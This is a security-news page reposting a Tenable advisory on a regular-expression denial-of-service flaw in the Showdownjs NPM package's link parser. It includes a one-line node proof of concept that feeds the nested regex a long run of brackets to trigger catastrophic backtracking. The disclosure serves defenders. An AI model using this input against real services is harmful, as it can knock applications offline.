all InfoSec news
Showdownjs Denial of Service
Feb. 26, 2024, 4:01 p.m. | Evan Grant
Tenable Research Advisories www.tenable.com
A researcher at Tenable discovered an issue in the Showdownjs NPM package which could lead to a denial of service. Showndownjs' anchors subparser used to parse links has a nested regular expression which can lead to denial of service conditions given malicious input.
Proof of Concept:
# Run the time command with node, containing the vulnerable regex expression
time node -e '/\[((?:\[[^\]]*]|[^\[\]])*)] ?(?:\n *)?\[(.*?)]()()()()/g.test("[[[[[[[[[".repeat(9999))'
Evan Grant
Mon, 02/26/2024 - 11:01
can command concept conditions denial of service input issue links malicious nested node npm npm package package proof regular regular expression researcher run service tenable
More from www.tenable.com / Tenable Research Advisories
Approach.App Multiple Vulnerabilities
1 week, 6 days ago |
www.tenable.com
Path Traversal Affecting Multiple CData Products
3 weeks, 6 days ago |
www.tenable.com
Arcserve Unified Data Protection 9.2 Multiple Vulnerabilities
1 month, 2 weeks ago |
www.tenable.com
Jobs in InfoSec / Cybersecurity
Social Engineer For Reverse Engineering Exploit Study
@ Independent study | Remote
DevSecOps Engineer
@ LinQuest | Beavercreek, Ohio, United States
Senior Developer, Vulnerability Collections (Contractor)
@ SecurityScorecard | Remote (Turkey or Latin America)
Cyber Security Intern 03416 NWSOL
@ North Wind Group | RICHLAND, WA
Senior Cybersecurity Process Engineer
@ Peraton | Fort Meade, MD, United States
Sr. Manager, Cybersecurity and Info Security
@ AESC | Smyrna, TN 37167, Smyrna, TN, US | Santa Clara, CA 95054, Santa Clara, CA, US | Florence, SC 29501, Florence, SC, US | Bowling Green, KY 42101, Bowling Green, KY, US